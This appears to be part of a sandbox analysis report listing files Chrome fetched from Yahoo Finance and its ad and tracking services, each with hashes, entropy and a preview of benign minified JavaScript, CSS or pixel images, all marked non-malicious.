                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as K,a0 as Y,e as O,t as M,b as A,d as w,f as C,h as R,i as b,j as B,q as I,k as U,l as h,m as Z,o as x,n as F}from"./scheduler.Dr9AAxFe.js";import{S as Q,i as W,c as V,b as j,m as q,g as ee,a as k,e as te,t as N,d as H}from"./index.DCSmZEjO.js";import{e as oe,j as ne,d as le,t as v,_ as z,g as se,h as re,aj as ie}from"./commonUtil.CI22_Irn.js";import{B as G}from"./Button.DpT5MMuf.js";import ae from"./ErrorMsg.DF_ReW41.js";import{S as fe}from"./Spinner.CydnjLPC.js";import{l as J,f as ce}from"./logUtil.hOue7iAU.js";import{l as ue,u as de}from"./updatePortfolioChartStore.De0LOpBM.js";import{l as me}from"./loadPortfolios.CToUELqx.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js";async function _e(n,e){var m,p;const o=await oe(n);if(!ne(o)||!((m=o.user)!=null&&m.guid))return null;const{pfId:t,setLoading:s=!1}=e;if(!t){const u=new Error("Bad request for deletePortfolio, missing pfId");return J(n,{pfId:t},{data:u,perfLabel:"deletePortfolio"}),Promise.rejec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3771), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293003105028217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:dWFMWC16GwgKEty6nQAJR+9ChGZ3qcU2cXIArRRZrUkrnyfBsjys9Y0tj/1p96jK:YMWC16BgXy6nPJRrhEuIyjyKr1dKny51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B89CAE0EEFF70E139AF64EED93353C19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:218DA476F2FE7CFA2D168CA54D0E4E84956075B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBCACDA475ED69433F5F60034F72C38BF7DFA6D4C89F7EE7A2C2F88945F813B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6FDD739D2ADD3CB4D2AC2A825F28216A4A456C9CB4D58A2951877C8E739CAD7F0A88056EF4042FCB0233549FFDAF8DB1724B1942E1F3D459B4E89BF52D38AE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var h=/ip(hone|od)|(android).+mobile|opera m(ob|in)i/i.test(navigator.userAgent)||/Android/.test(navigator.userAgent)||/iPhone/.test(navigator.userAgent)||/iPad/.test(navigator.userAgent);var c="c.evidon.com";var b;b="r231121";var a={},d=document.getElementsByTagName("SCRIPT"),l=window.location.href.indexOf("http://")===0?"http://":"https://",e=l+c;window.BAPStart=function(s){try{BAP.start(s)}catch(q){var o=window._bab||[];var r={};for(var t in s){if(s.hasOwnProperty(t)){r[t]=s[t]}}o.push(r);window._bab=o}};function i(o){return true}function m(){try{return window.localStorage&&window.postMessage}catch(o){return false}}function j(p,o,w){if(h){var q=document.URL.indexOf("http://")===-1&&document.URL.indexOf("https://")===-1;if(q){return 1}var v=window.navigator.userAgent.toLowerCase();if(/android/.test(v)){var r=document.documentElement;var x=Math.abs(parseInt(p,10)-r.clientWidth)<10;var s=Math.abs(parseInt(o,10)-r.clientHeight)<5;return x&&s&&!w?1:0}else{var u=window.navigat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3735), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.835929595261791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:M9xN8LvJKRE38YLZvdV9jqmsol0e3fCkyc:M9xN8bJKRQ88VVsoGe3fJF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A03361886464B469ACD3A16CFBD022ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:85862F5A82AE0389B03270BD74EB632E0D66BE12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DF636670DA8B690EF359C8A48A24ABACD6E8BBD27288E38FB2F24EC922895805
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8AA03B15DE113EE7147A72A83E34E76D7120CD005452F4726B8D61039DE23673AA7A177BB198ADBEDAC64871BA49C5EFD116B9708B84CB0F9E45AE8C48E8C339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.weather-card-form:after{background:var(--white);border-bottom:1px solid var(--dirty-seagull);border-right:1px solid var(--dirty-seagull);content:"";height:8px;position:absolute;right:8px;top:-6px;-webkit-transform:rotate(225deg);transform:rotate(225deg);width:8px}#grid-layout .weather-card-form:after,#grid-layout button.wafer-geolocation-denied,#weather-widget-next-gen .weather-card-form:after,.weather-card-form.wafer-form-complete,.weather-card-form.wafer-form-inprogress{display:none}.lockerWeather-card-form .wafer-autocomplete:focus{outline:0}.wafer-autocomplete-list{list-style-type:none;padding:0;margin:0;-webkit-transition:-webkit-transform opacity .3s ease-out;transition:transform opacity .3s ease-out;trans
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (801)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390721824599287
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:eIaPb+kNVuqb8mKB6jB18mKBfiHTaKm3Bu:e/P7N4mw6Mmwfi2nxu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E8BED9F8953F95E4222BF2B164323ED4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7DEC517C5C49AD67C4F241654F8955BBC8117BA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E4E54DABDCA5C06C5BE6925E44303C4F817DA086A310A4F0BAA155A683FA9E10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CEA1567801CCEFD91C3A7EF389AA0A48AF194326F8D87A53BC95FCC36981766304A6C790E46FF0810C5038F97E07BDF754BC35A5003D24AEDC0414EE148B1F70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{t as m,u}from"./commonUtil.CI22_Irn.js";import{m as d}from"./utils.QCnxU1jw.js";const o=d(["168x126"]),S={imageSize:o.sizeMap["168x126"],imageTags:o.tags,isPagination:!0,queryRef:"newsAll"},P=["^YH311","^YH102","^YH308"];function b(a){var r,t;const{params:e}=a,s=(r=e==null?void 0:e.sector)==null?void 0:r.replace(/\?.*/,"").trim().toLowerCase();return{industry:(t=e==null?void 0:e.industry)==null?void 0:t.replace(/\?.*/,"").trim().toLowerCase(),sector:s}}function h(a=[]){const s=[{key:"sectors",name:m("SECTORS",{ns:"sectors"})},...a];return s.filter(Boolean).map(({key:n,name:r},t)=>{const c=s.slice(1,t+1).map(({key:l})=>l),[i,g]=c;return{href:u({sector:i,industry:g}),i13n:{elm:"sector",sec:"sector-breadcrumb",subsec:t===0?"sectors-all":n},title:r}})}export{b as a,P as d,h as g,S as n};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (23479), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.181521598468942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:rFfj/6GpZNfFQi4mvfm0N+Dzao0QMyb0+qB9M:5L/vLNQi4m3m02zMQMyb05s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E6A743E22F5B7027F77359F0A549572B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3EE7D7C1F50B654AFF770E4EED916502D7D62B7B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E6C22E612E82D6AF3F495357F5EF64A81467312A4A817F3625B15490629257EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A440F8772A29CF710417746BBF0AF9994C6C609BAD6B313DAB3FFC8F73BB4947E7AF8D52D3DEEBC78B4863BC961F5501A03768C78AD2BECC490CBB0838819FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){var r="BrowserSubscriptionHelper",i=["chrome","chrome mobile"],p="error",f="info",n="pushNotifications",o="undefined",t="Unsupported Browser.",u="granted",a="denied",c="subscriptions",s="type",d="push",e="display-push-promos",l="js-push-subscribe",h="rapidnofollow",b="subscriptionFail",m="Permission denied by user";function g(e,n,i){this.init(e,n,i)}if(g.prototype={init:function(e,n,i){var r=this;r.beaconer=n,r.tracker=i,r.config={appServerPubKey:e.appServerPubKey,bucket:e.bucket,confirmationNotification:e.confirmationNotification||{},enableIndexedDbDurationBeacon:e.enableIndexedDbDurationBeacon||!1,enablePermissionChangeBeacon:e.enablePermissionChangeBeacon||!1,overlay:e.overlay||{},resubscribeOnChurn:e.resubscribeOnChurn||!1,serviceWorkerScope:e.serviceWorkerScope||"/",serviceWorkerUrl:e.serviceWorkerUrl,spaceId:e.spaceId,subscriptionService:e.subscriptionService||{},supportedBrowsers:e.supportedBrowsers||{},userAgent:e.userAgent||{}},r.appServerPubKeyArr=r.urlB64ToUint8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=d23c890c-93a2-0051-1cdd-46d7ce72c695
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12610)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341220470097978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:/ytAo7LMRBuQTx+Zy3OYX2wUi6lbY9GhtItEUtAkUMLProxp9bteUh7zOOICrY:6rMGQTxmjpNYgtItEUtCbtDOYrY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2F446C93D8EBFEFA342A3C1033EB4DE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E922D3D3EDCE6B7F8203745428F7707EDF1A16CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7A984B733BA7593F858D8B90C4C16A5C0FC2E1CDA11AF263EF9F0619A2630EBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:150C94D2FCA90C71AFFF7AD2348C369235362C115BE69667EE4460CB0E29CFA4C83A665915A22A2ABE548866B73C38DCF0D71D1146BA2CC295BA1083C56C4F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:self.studioLoader.context.evalInContext("window.STUDIO_SDK_START=+new Date();var wo={},xo=/OS (\\S+) like/,yo=/Android (\\S+);/;function zo(a,b){wo[b]==null&&((a=a.exec(ob()))?(a=a[1].replace(/_/g,\".\"),wo[b]=jb(a,b)>=0):wo[b]=!1);return wo[b]};var Ao=function(){M.call(this);this.l=this.o=this.j=!1;this.h=0;this.v=[];this.C=!1};p(Ao,M);var Bo=function(a,b){b==null||a.j||(a.g=b,a.D=!ec&&!fc,a.I=ec||fc,a.D?a.g.addEventListener(\"click\",v(a.A,a),!1):a.I&&(a.g.addEventListener(\"touchstart\",v(a.N,a),!1),a.g.addEventListener(\"touchmove\",v(a.G,a),!1),a.g.addEventListener(\"touchend\",v(a.H,a),!1)),a.j=!0)},Co=function(a){a.g!=null&&a.j&&(a.j=!1,a.D?a.g.removeEventListener(\"click\",v(a.A,a),!1):a.I&&(a.g.removeEventListener(\"touchstart\",v(a.N,a),!1),a.g.removeEventListener(\"touchmove\",v(a.G,a),!1),a.g.removeEventListener(\"touchend\",v(a.H,a),!1)))};Ao.prototype.N=function(a){this.o=!0;this.h=a.touches.length;this.C=Do(this,a.touches)||a.touches.length!=1;a=a.touches;this.v=[];for(v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2790
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.8767227836869775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qo7fR/FIbPYaCtgDY7aybeOur7PpRJl0+HsQK/FWPz09pqMSwk4Fv8d5tRjtXRHb:qZbYaHjvBLl0QI/FAK9SwL8L7Hb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2B4047EF139810F5403FE2987BD2DC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:529276C43A521743EB53DF1CFE8BC8FFFF220DFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:38C163ECBA73C000DF0ABFE2AD5C4F941164909F8078E8A304DBA4DB696BC709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D1E527D489BC5DB742681F87A0EFF100B8126BAEE0B9765E5BCCD9360A917ED4EE870ABD79E417693E36E600D4CBADC11E30CB73A630C3CE11A51BE4A2DC86C8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq...........v..LW................?..$E........4.................;..!..0..4..+.......$G..1..............,..G..3...............f.....f.....t........Ae.Xx..(.?d.0W.........d..f..w..z..x..Gk.p..r......Tt.x.......d.....+....Gj...........<b."L.......Op....6[.......Kl.Tt.Vw.Yw..............V.s.....+....}......p..Wv....'Q....Ut.Rt.+T....y.....k.. H......Wx....&....8^.l...3....Fh.?e._}...Vv.Gk.....Yv.Z|.Ln.Dh.'R.'U.e..Hi.5\.My.Kk.m..Hk.....'.k..3X.1W.Gf....6[.{.....:.>\.+S.Ad..;.Yt..F.9^.On.z...5.:c.&L....z..Mm....k....Fk.z..1V.v..Bb.1Y.0T.Vw... I.3W.3W.....9....9`.@e.<^..R.^z....a.....y..Ip.}..m..c...3..1..-..4..A..4..8..(..D..&../..2..+.....5..0..@..I.!N.+V.#K..I..;.3\..J..)..D.+W.)R.$P..<.Ag.6`..F..>..2..=..0. N.?h.Hj..4..D.:c..7..;.vC......tRNS...........................+..........5'S4OO......"......\...a..`/.mH7~<...<>Q'B.......]>....(-78.kW.j+n.t...!...."..GS.0.i.b.J...^..p............
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (58453)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):480231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.420644885310271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:V9iviwh+gUW1T3gv69owLgI9pNThOyk9BsHgv5LsUh3:3ZwYgUkTwv69o0z9pNTf08gvxh3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C37A1910680F317861AA498CA50792EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5CBA6D1C1A9CE168ADF4B150676CDC6C5EB74402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C4ACE0B2EBDB364DE05AB1E835D08BB84BE0342A2906D2625D5D79AD5655724D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E2095C1BFCB0DEADF7BAB56810905DFE8309CBB66A5568286A8B1A09B3686EA99E70FA794C254C44541CEEDA977B169371C6675703FB7D9628111CDD427FC62E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* prebid.js v8.51.0.Updated: 2024-10-04.Build: 2.0.33.Modules: consentManagement, consentManagementGpp, consentManagementUsp, criteoBidAdapter, enrichmentFpdModule, gdprEnforcement, gppControl_usnat, gppControl_usstates, gptPreAuction, ixBidAdapter, liveIntentIdSystem, medianetBidAdapter, openxBidAdapter, prebidServerBidAdapter, priceFloors, pubmaticBidAdapter, rtdModule, rubiconBidAdapter, taboolaBidAdapter, tripleliftBidAdapter, ttdBidAdapter, userId, yahooAnalyticsAdapter, yahooPrebidServer, yahooRtdProvider, yahoosspBidAdapter, yieldmoBidAdapter, identityLinkIdSystem, pairIdSystem */.if(window.pbjs&&window.pbjs.libLoaded)try{window.pbjs.getConfig("debug")&&console.warn("Attempted to load a copy of Prebid.js that clashes with the existing 'pbjs' instance. Load aborted.")}catch(e){}else (function(){.(()=>{var r,t={5649:(r,t,e)=>{function n(r,t,e,n,o){for(t=t.split?t.split("."):t,n=0;n<t.length;n++)r=r?r[t[n]]:o;return r===o?e:r}e.d(t,{A:()=>n})},5920:r=>{./*.* @license MIT.* Fun Hoo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1196)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.979233988205513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:9m0w+luQdHV35MwoV30wPLPlP+x+WHhrkRWv:O+lug2ww30wPLPlPFWHhCw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7F67F8E7DC0C8FB74E8120723CF6C7D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D7E303EC802950B33B87B8E4E7E59E55C2CD1A85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1017EB6D060851E77B718CD90987513A5ED1CD0FFBABE5D7EC100E2AA8C19FFE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CAF9DB123C03D19494F12B35E44A32DBB8EF3C287420A3BC910825BF802D9ABF2C4E6738CE7449DE068F61E8C63D6DB4239F00194E8A3C4F2F869F44A5493ACC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/PortfolioSymbolCount.CdFvEngM.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.bold.yf-1uof5l0{font-weight:var(--font-bold)}span.yf-1p48w37{display:block;overflow:clip;white-space:nowrap;text-overflow:ellipsis}.bold.yf-1p48w37{font-weight:var(--font-bold)}.pill.yf-138ystc{background-color:var(--surface2);gap:var(--space-4);display:inline-flex;color:var(--primary);border:1px solid var(--primary);padding:.125rem var(--space-1);height:-moz-fit-content;height:fit-content;align-items:center;border-radius:var(--border-radius-s);font-size:10px;font-weight:var(--font-bold)}.icon.yf-14p0zqn{width:var(--space-6);height:var(--space-6)}.container.yf-14p0zqn{display:flex;flex-direction:row;align-items:center}.subContainer.yf-14p0zqn{display:flex;flex-direction:column;padding-left:var(--space-1);overflow:hidden;text-overflow:ellipsis}.pfName.yf-14p0zqn{font-weight:var(--font-normal);font-size:var(--font-m);overflow:hidden;text-overflow:ellipsis;margin-right:var(--space-1)}.indicator.yf-14p0zqn{font-weight:var(--font-normal);font-size:var(--font-s);overflow:hidden;text-overflo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
